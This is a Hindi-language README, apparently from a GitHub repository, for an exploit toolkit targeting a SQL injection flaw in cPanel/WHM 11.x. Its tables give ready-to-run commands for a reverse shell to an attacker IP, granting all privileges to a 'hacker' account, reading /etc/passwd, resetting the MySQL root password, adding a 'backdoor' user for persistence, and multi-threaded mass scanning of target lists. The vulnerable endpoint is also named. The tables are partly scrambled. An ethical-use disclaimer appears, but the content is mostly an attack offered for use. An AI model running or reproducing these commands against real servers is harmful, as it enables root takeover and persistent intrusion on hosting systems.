
👾 CVE-2026-58048 – cPanel रूट SQL एक्ज़ीक्यूशन टूलकिट (CVSS 9.4) | अनपैच्ड cPanel और WHM 11.x के लिए पूर्ण Red/Blue Team टूलकिट सूट। 2 टूल्स: Safe Checker (ऑडिट/रिपोर्टिंग), Weaponized (रिवर्स शेल, पर्सिस्टेंस, UDF RCE, डिप्लॉयमेंट, फ़ाइल रीड/राइट, डेटाबेस ऑपरेशन्स, मास स्कैन)। Python के साथ। 🦾 नैतिक रूप से उपयोग करें, कानूनी रहें <3

⚠️ केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए टूल प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।
CVE‑2026‑58048 cPanel & WHM संस्करण 11.x में एक गंभीर SQL इंजेक्शन भेद्यता है जो एक प्रमाणित cPanel उपयोगकर्ता को डेटाबेस नाम बदलने की कार्यक्षमता के माध्यम से MySQL रूट विशेषाधिकारों के साथ मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।
ANSI_QUOTES मोड में सेट करता है, जो पार्सिंग व्यवहार को बदल देता है।11.137.1.6 से नीचे भेद्य| टूल | उद्देश्य | इच्छित उपयोगकर्ता |
|---|---|---|
exploit.py | रिवर्स शेल, पर्सिस्टेंस, UDF RCE, फ़ाइल पढ़ना/लिखना, डेटाबेस ऑपरेशन, प्रॉक्सी समर्थन, और मास स्कैनिंग के साथ पूर्ण हथियारबंद टूलकिट। | रेड टीमें / अधिकृत पेंटेस्टर |
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt
requests
urllib3
colorama
pymysql
exploit.py पैरामीटरsafecheck.py पैरामीटरएक्सप्लॉइट निम्नलिखित cPanel UAPI एंडपॉइंट का उपयोग करता है:
यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
safecheck.py |
| गैर-घुसपैठिया भेद्यता जाँचकर्ता जो cPanel संस्करण का पता लगाता है और किसी भी दुर्भावनापूर्ण पेलोड को निष्पादित किए बिना जोखिम का आकलन करता है। विस्तृत रिपोर्ट तैयार करता है। |
| ब्लू टीमें / सुरक्षा ऑडिटर |
| विशेषता | exploit.py | safecheck.py |
|---|
| भेद्यता का पता लगाना | ✅ | ✅ |
| संस्करण का पता लगाना | ✅ | ✅ |
| MySQL रूट SQL इंजेक्शन | ✅ | ❌ |
| रिवर्स शेल | ✅ | ❌ |
| पर्सिस्टेंस (cPanel उपयोगकर्ता निर्माण) | ✅ | ❌ |
| UDF RCE (कमांड निष्पादन) | ✅ | ❌ |
| फ़ाइल पढ़ना/लिखना | ✅ | ❌ |
| डेटाबेस ऑपरेशन (कोई भी SQL) | ✅ | ❌ |
| प्रॉक्सी समर्थन | ✅ | ✅ |
| मास स्कैनिंग (मल्टी-थ्रेड) | ✅ | ❌ |
| इंटरैक्टिव शेल | ✅ | ❌ |
| गैर-घुसपैठिया (सुरक्षित) मोड | ❌ | ✅ |
| वर्बोज़/डीबग मोड | ✅ | ✅ |
| SSL सत्यापन नियंत्रण | ✅ | ✅ |
| कस्टम User‑Agent | ✅ | ✅ |
| अनुरोध विलंब / पुनः प्रयास | ✅ | ❌ |
| JSON / रिपोर्ट आउटपुट | ✅ | ✅ |
| एंडपॉइंट पहुँच जाँच | ❌ | ✅ |
| SQL मोड लीकेज का पता लगाना | ❌ | ✅ |
| परिदृश्य | अनुशंसित टूल |
|---|
| ब्लू टीम – यह सत्यापित करना कि आपकी cPanel स्थापना भेद्य है या नहीं | safecheck.py |
| सुरक्षा ऑडिट – गैर-घुसपैठिया भेद्यता मूल्यांकन | safecheck.py |
| रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षण | exploit.py |
| बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षण | safecheck.py |
| मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँच | exploit.py (केवल पता लगाना) |
| घटना प्रतिक्रिया – यह जाँचना कि सिस्टम समझौता किए गए हैं या नहीं | safecheck.py |
| पैरामीटर | विवरण |
|---|
-t, --target | लक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083) |
-l, --target-file | मास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-u, --mysql-user | cPanel/MySQL उपयोगकर्ता नाम |
-P, --mysql-pass | cPanel/MySQL पासवर्ड |
--mysql-port | MySQL पोर्ट (डिफ़ॉल्ट: 3306) |
-p, --port | cPanel पोर्ट ओवरराइड करें (डिफ़ॉल्ट URL से या 2083) |
--threads | मल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10) |
-o, --output | परिणाम फ़ाइल में सहेजें (एकल लक्ष्य) |
--log | विस्तृत आउटपुट के लिए लॉग फ़ाइल |
-v, --verbose | वर्बोज़ आउटपुट |
--proxy | HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080) |
-ua, --user-agent | कस्टम User‑Agent |
--no-keep-alive | सत्र को जीवित न रखें |
--delay | अनुरोधों के बीच विलंब (डिफ़ॉल्ट: 2.0s) |
--max-retries | अधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3) |
--ssl-verify | SSL प्रमाणपत्र सत्यापित करें |
--cmd | निष्पादित करने के लिए कमांड (विशिष्ट के लिए sql: या udf: के साथ उपसर्ग करें) |
--inject | इंजेक्ट करने के लिए कस्टम SQL (अन्य क्रियाओं को ओवरराइड करता है) |
--reverse-shell | रिवर्स शेल IP:PORT (UDF का उपयोग करता है) |
--passwd | रूट MySQL पासवर्ड बदलें |
--adduser | cPanel उपयोगकर्ता बनाएँ (USER DOMAIN PASSWORD) |
--read | LOAD_FILE के माध्यम से फ़ाइल पढ़ें |
-i, --interactive | शोषण के बाद इंटरैक्टिव शेल |
--verify | MySQL लॉगिन का प्रयास करके शोषण की सफलता सत्यापित करें |
--ping | शोषण से पहले लक्ष्य को पिंग करें |
| पैरामीटर | विवरण |
|---|
-t, --target | लक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083) |
-v, --verbose | वर्बोज़ आउटपुट |
--proxy | HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080) |
-ua, --user-agent | कस्टम User‑Agent |
--ssl-verify | SSL प्रमाणपत्र सत्यापित करें |
--timeout | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10) |
--log | रिपोर्ट फ़ाइल में सहेजें |
--json | परिणाम JSON प्रारूप में आउटपुट करें |
| # | परिदृश्य | कमांड |
|---|
| 1 | त्वरित भेद्यता जाँच | python safecheck.py -t https://cpanel.example.com:2083 |
| 2 | रिपोर्ट के साथ विस्तृत स्कैन | python safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v |
| 3 | रिवर्स शेल | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | कस्टम SQL निष्पादित करें (रूट) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'" |
| 5 | संवेदनशील फ़ाइल पढ़ें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | MySQL रूट पासवर्ड बदलें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | नया cPanel उपयोगकर्ता बनाएँ (पर्सिस्टेंस) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | शोषण के बाद इंटरैक्टिव शेल | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | फ़ाइल से मास स्कैनिंग | python exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json |
| 10 | प्रॉक्सी और कस्टम User‑Agent का उपयोग करें | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)" |
| एंडपॉइंट | उद्देश्य |
|---|
/execute/Mysql/create_database | अस्थायी डेटाबेस बनाएँ |
/execute/Mysql/delete_database | बनाए गए डेटाबेस साफ़ करें |
/execute/Mysql/rename_database | भेद्य एंडपॉइंट – SQL इंजेक्शन को ट्रिगर करता है |
/execute/Version/get_version | प्रमाणीकरण और संस्करण जाँच |
/execute/UserManager/create_user | नया cPanel उपयोगकर्ता बनाएँ (पर्सिस्टेंस) |
/execute/UserManager/list_users | मौजूदा उपयोगकर्ताओं की सूची बनाएँ |